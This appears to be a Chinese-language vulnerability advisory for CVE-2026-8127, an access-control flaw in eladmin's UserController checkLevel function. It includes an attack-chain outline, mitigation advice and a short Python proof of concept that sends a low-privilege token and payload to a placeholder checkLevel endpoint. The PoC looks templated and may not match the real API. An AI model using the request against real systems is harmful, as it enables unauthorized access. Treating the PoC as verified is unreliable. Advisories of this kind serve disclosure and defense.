CVE-2026-8127 eladmin访问控制失效漏洞

漏洞信息

漏洞编号

CVE-2026-8127

漏洞类型

访问控制失效

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

eladmin

漏洞概述

eladmin 2.7及以下版本存在安全漏洞。该漏洞源于组件Users API Endpoint文件/rest/UserController.java中checkLevel函数的访问控制逻辑存在缺陷。攻击者无需用户交互，仅需低权限即可远程利用此漏洞，导致系统遭受未授权访问。目前漏洞细节已公开，但厂商尚未响应。

技术细节

该漏洞主要影响eladmin系统的用户管理模块。在/src/main/java/me/zhengjie/rest/UserController.java文件的checkLevel函数中，代码逻辑未能严格校验调用者的权限上下文。由于存在访问控制不当的缺陷，攻击者可以构造特定的HTTP请求包，发送至受影响的API端点。攻击者利用低权限账户即可绕过原本的安全限制，执行超出其权限范围的操作。这种逻辑漏洞允许攻击者在未经授权的情况下读取、修改或删除数据，对系统的机密性、完整性和可用性造成威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统运行的是eladmin 2.7或以下版本。

STEP 2

2. 获取低权限账号

攻击者注册或获取一个普通用户账号，拥有合法的低权限Token。

STEP 3

3. 构造恶意请求

攻击者利用该低权限Token，构造向 UserController 中 checkLevel 接口发送的HTTP请求，试图绕过权限检查。

STEP 4

4. 执行未授权操作

由于漏洞存在，服务器端未正确拦截请求，攻击者成功执行本需高权限才能进行的操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target_url = "http://target-eladmin-domain/api/users/checkLevel"

# Attacker's low-privilege token
auth_token = "eyJhbGciOiJIUzUxMiJ9..."

headers = {
    "Authorization": f"Bearer {auth_token}",
    "Content-Type": "application/json"
}

# Malicious payload attempting to access restricted function
payload = {
    "level": 1,
    "userId": 1 
}

try:
    response = requests.post(target_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Exploit successful! Access control bypassed.")
        print(f"[+] Response: {response.text}")
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

eladmin <= 2.7

防御指南

临时缓解措施

建议立即检查系统日志，排查是否存在针对checkLevel接口的异常调用。在官方修复补丁发布前，可通过在网络层限制API访问来源，或手动修改代码中的权限校验逻辑来缓解风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8127
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8127
3 Details https://www.cvedetails.com/cve/CVE-2026-8127/
4 VulDB https://vuldb.com/cve/CVE-2026-8127
5 Link https://github.com/elunez/eladmin/issues/897
6 Link https://vuldb.com/submit/808771
7 Link https://vuldb.com/vuln/361917
8 Link https://vuldb.com/vuln/361917/cti